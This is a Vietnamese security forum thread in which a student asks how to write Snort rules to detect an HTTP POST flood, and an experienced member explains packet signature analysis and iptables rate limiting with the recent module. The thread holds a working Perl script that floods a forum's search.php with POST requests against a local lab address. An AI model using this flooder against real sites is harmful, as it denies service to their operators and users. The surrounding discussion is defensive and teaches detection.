+ Bạn cho biết dùng chương trình gì để Dos?
+ Bạn mở file dos.rules tham khảo thêm. Đặt thêm biến flow:to_server,established.
+ Bổ sung biến content (vì dấu hiệu nhận biết Dos đâu chỉ có một)

Hope this help!
 

#!/usr/bin/perl
use IO::Socket;

$x = 0;
$host = "192.168.100.2";
$pth = "/";

while($x != 555555)
{

$postit = "do=process&quicksearch=1&childforums=1&exactname=1&s=&securitytoken=1236864212-555b06a6ad17659074d2817bf2fc493c5ac1208b&query=iphone&showposts=0";

$lrg = length $postit;

my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nCo loi xay ra: $!\n" unless $sock;

print $sock "POST $pth"."board/search.php?do=process HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: image/png,image/*;q=0.8,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us,en\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

syswrite STDOUT, "Dang DoS";


$x++;
} 

offset:30; depth:80;: tôi muốn thâu hẹp phạm vi tìm kiếm dấu hiệu đặc thù để snort không mất thời gian đi lục tìm trong suốt một payload dài thậm thượt.  

Em xin chào anh conmale,

Em thấy các gói tin mà wireshark bắt được có đoạn | 40 00 40 06 | đều giống nhau, nên em nghĩ đây có thể là dấu hiệu nhận biết gói tin... nhưng khi em dùng tấn công kiểu khác thì thấy cũng có đoạn này ---> có thể em đã bị lầm...

Anh commale có thể gợi ý cho em phần nào quan trọng để có thể bắt gói tin được ko ?

Em xin cảm ơn Anh. 

vminh wrote:

Em xin chào anh conmale,

Em thấy các gói tin mà wireshark bắt được có đoạn | 40 00 40 06 | đều giống nhau, nên em nghĩ đây có thể là dấu hiệu nhận biết gói tin... nhưng khi em dùng tấn công kiểu khác thì thấy cũng có đoạn này ---> có thể em đã bị lầm...

Anh commale có thể gợi ý cho em phần nào quan trọng để có thể bắt gói tin được ko ?

Em xin cảm ơn Anh. 

Nói về mặt kỹ thuật, em nên dùng Wireshark để phân tích gói tin HTTP (thường là gói ACK trên bình diện TCP) để xem payload của nó và tìm ra signature đặc biệt của gói tin này. Cụ thể là gói tin có chữ "POST" hay "GET". Đừng xem gói tin TCP thông thường vì nó chỉ là một mảnh TCP chưa được gom lại để thành một gói HTTP hoàn chỉnh.

Nói về mặt logic, dùng snort để detect và ngăn cản DDoS thường không hữu hiệu bởi vì snort không có khả năng "đếm" xem một IP nào đó có gởi cùng 1 request như vậy nhiều lần trong một khoảng thời gian hay không. Nếu chỉ đơn thuần xét đến signature đặc biệt nào đó để cản DDoS thì em sẽ rất vất vả nếu như kẻ tấn công liên tục thay đổi dạng request. Cách tốt nhất nên dùng module -m recent kèm theo những điều kiện đặc thù nào đó để hình thành luật chống DDoS. Nguyên lý căn bản là: nếu một IP gởi cùng một request hoặc nhiều request có cùng tính chất quá nhiều lần trong một khoảng thời gian nào đó thì cản nó. Tuy nhiên việc cản lọc này cũng cần phải có thời hạn nhất định không thì firewall block IP đó vĩnh viễn thì hoá ra mình sẽ tự tạo "từ chối dịch vụ" cho chính mình (vì rốt cuộc chẳng có mấy người vô site của mình nữa - đặc biệt là IP động và được tái sử dụng như ở VN). Module -m recent là một công cụ lợi hại để giúp xác định số lần requests trong 1 khoảng thời gian cũng như giúp tháo bỏ cản lọc IP ấy sau một khoảng thời gian nào đó.

Em nên tìm đọc "Ký sự những vụ DDoS đến HVA" trên diễn đàn này để rút tỉa thêm. Trong loạt bài này anh đã ít nhiều phân tích những khía cạnh em đang tìm hiểu.

Good luck.